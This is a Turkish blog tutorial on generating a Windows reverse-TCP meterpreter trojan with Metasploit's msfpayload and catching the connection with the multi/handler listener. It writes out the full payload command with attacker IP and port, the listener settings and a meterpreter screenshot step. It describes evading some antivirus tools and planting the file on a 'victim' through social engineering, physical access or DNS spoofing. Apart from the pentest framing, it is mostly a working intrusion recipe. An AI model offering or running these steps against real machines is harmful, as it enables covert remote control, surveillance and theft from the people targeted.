Metasploit ile Trojen Oluşturma

Penetrasyon testlerinde, sistemlerin ve kullanıcıların zafiyetlerinden yararlanarak trojan-backdoor kullanılabilmektedir. Bu makalede bazı antivirus programlarına yakalanmadan kali linux üzerinden backdoor payload oluşturarak kurban bilgisayarına nasıl sızılacağından bahsedeceğiz. Böylece kurban bilgisayarı üzerinde tam kontrol sağlanabilecektir.

Metasploit Framework kullanarak bir arka kapı oluşturabiliriz. Hedef sistemi belirledikten sonra Metaspolit Framework araçını kullanarak Windows(x32/x64) ve Linux işletim sistemi için çalıştırabilir bir dosya üreteceğiz. 

Bizim örneğimizde Windows işletim sistemine reverse TCP bağlantısı için uygun bir çalıştırabilir dosya (.exe) üreteceğiz. 


Trojan-Backdoor nedir?
Hedef bilgisayara yüklendikten sonra, başkaları tarafından kontrol edilmesini sağlayan kötü amaçlı programlardır. Bu saldırgana bilgisayar üzerinde bütün herşeyi yapma izni verebilmektedir.

Trojan-Backdoor nasıl üretilir?

Şimdi çalıştırabilir kodumuzu üretmede  meterpreter reverse payload’u dahil ederek msfpaylaod kullanacağız. Meterpreter payload dosya bilgisi aşağıdaki gibidir. LHOST saldırganın IP adresi, LPORT saldırganın dinleme yapacağı port bilgisidir.

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.17 LPORT=6666 x > ~/Desktop/trojan.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: {“LHOST”=>”192.168.1.4”, “LPORT”=>”6666”}

Artık trojan  hazır ve bunu kurban  sistemine yerleştirilebilir. Bunu sosyal mühendislik yöntemlerini kullanarak, fiziksel olarak yükleyerek, DNS spoof ederek gideceği sayfaya belirlenen  sayfadan  trojani yükleyerek, vb.  gerçekleştirilebilir. 

Trojan sistemde çalışmaya başladıktan sonra dinleme moduna geçebiliriz.

Metasploit konsoluna

msf > use exploit/multi/handler

Kullanacağımız payload’u ekleyelim.

paylaod set PAYLOAD windows/meterpreter/reverse_tcp

Bağlantı elde edebilmek için kendi IP adresimizi yazıyoruz.

set LHOST 192.168.2.17

Bağlantı yapmak istediğimiz Port değerini ekleyelim.

set LPORT 6666

“exploit ” dedikten sonra dinleme moduna geçiyoruz. Hedef sistem de yüklenen dosyamız çalıştırıldıktan sonra Meterpreter session bilgisi  aşağıdaki gibi bize dönecektir.

Kurban bilgisayarından yakanılan ekran görüntüsü

meterpreter > screenshot

Trojan oluşturulan dosya genelde küçük boyutta ve bize dosya yüklemek için bir arka kapı sunmaktadır. Sistem bilgisayarından bu trojan/backdoor isteği geldikten(oturum yakalandıktan) sonra saldırgandan hedef sisteme daha büyük boyutlu bir dosya transfer edilmektedir. Aslında ilk yüklenen dosya ikinci(asıl backdoor) dosyanın yüklenmesini sağlamakta ve bu ikinci dosya ile saldırgan, hedef sistemi kontrol edebilmektedir.

You may also like...

Bir yanıt yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir